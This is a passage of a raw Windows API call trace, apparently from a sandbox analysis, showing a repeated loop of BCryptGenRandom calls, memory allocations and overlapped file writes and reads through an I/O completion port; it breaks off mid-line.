[0204.842] free (_Block=0x1fa91d0) [0204.842] free (_Block=0x1fa2ed8) [0204.842] free (_Block=0x1fa90b8) [0204.842] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.842] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.843] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.843] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.854] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.855] CloseHandle (hObject=0x3cc) returned 1 [0204.855] free (_Block=0x3df0008) [0204.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.862] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.863] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.863] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.863] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.864] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.864] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.864] free (_Block=0x3e305b8) [0204.864] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.864] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.864] free (_Block=0x1fa91d0) [0204.864] free (_Block=0x1fa2ed8) [0204.864] free (_Block=0x1fa90b8) [0204.864] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.865] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.865] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.865] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.875] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.875] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.876] CloseHandle (hObject=0x3cc) returned 1 [0204.876] free (_Block=0x3df0008) [0204.876] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.904] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.904] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.904] free (_Block=0x3e305b8) [0204.904] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.904] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.905] free (_Block=0x1fa91d0) [0204.905] free (_Block=0x1fa2ed8) [0204.905] free (_Block=0x1fa90b8) [0204.905] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.905] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.919] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.919] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.919] CloseHandle (hObject=0x3cc) returned 1 [0204.919] free (_Block=0x3df0008) [0204.919] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.929] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.929] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.929] free (_Block=0x3e305b8) [0204.929] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.929] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.930] free (_Block=0x1fa91d0) [0204.930] free (_Block=0x1fa2ed8) [0204.930] free (_Block=0x1fa90b8) [0204.930] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.930] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.955] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xad, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.955] CloseHandle (hObject=0x3cc) returned 1 [0204.955] free (_Block=0x3df0008) [0204.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.964] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.965] free (_Block=0x3e305b8) [0204.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.965] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.965] free (_Block=0x1fa91d0) [0204.965] free (_Block=0x1fa2ed8) [0204.965] free (_Block=0x1fa90b8) [0204.965] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.966] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.977] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.977] CloseHandle (hObject=0x3cc) returned 1 [0204.977] free (_Block=0x3df0008) [0204.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.986] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.986] free (_Block=0x3e305b8) [0204.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.986] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.987] free (_Block=0x1fa91d0) [0204.987] free (_Block=0x1fa2ed8) [0204.987] free (_Block=0x1fa90b8) [0204.987] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.987] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.999] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.000] CloseHandle (hObject=0x3cc) returned 1 [0205.000] free (_Block=0x3df0008) [0205.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.008] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.008] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0205.008] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0205.009] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.009] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.009] free (_Block=0x3e305b8) [0205.009] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.009] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.010] free (_Block=0x1fa91d0) [0205.010] free (_Block=0x1fa2ed8) [0205.010] free (_Block=0x1fa90b8) [0205.010] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.010] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.021] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.021] CloseHandle (hObject=0x3cc) returned 1 [0205.022] free (_Block=0x3df0008) [0205.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0205.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0205.034] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.034] free (_Block=0x3e305b8) [0205.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.034] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.035] free (_Block=0x1fa91d0) [0205.035] free (_Block=0x1fa2ed8) [0205.035] free (_Block=0x1fa90b8) [0205.035] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.036] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.046] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.047] CloseHandle (hObject=0x3cc) returned 1 [0205.047] free (_Block=0x3df0008) [0205.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.055] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.055] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0205.055] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.055] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0205.056] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.056] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.056] free (_Block=0x3e305b8) [0205.056] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.056] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.056] free (_Block=0x1fa91d0) [0205.056] free (_Block=0x1fa2ed8) [0205.056] free (_Block=0x1fa90b8) [0205.056] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.057] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.057] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.057] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0205.496] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe0, 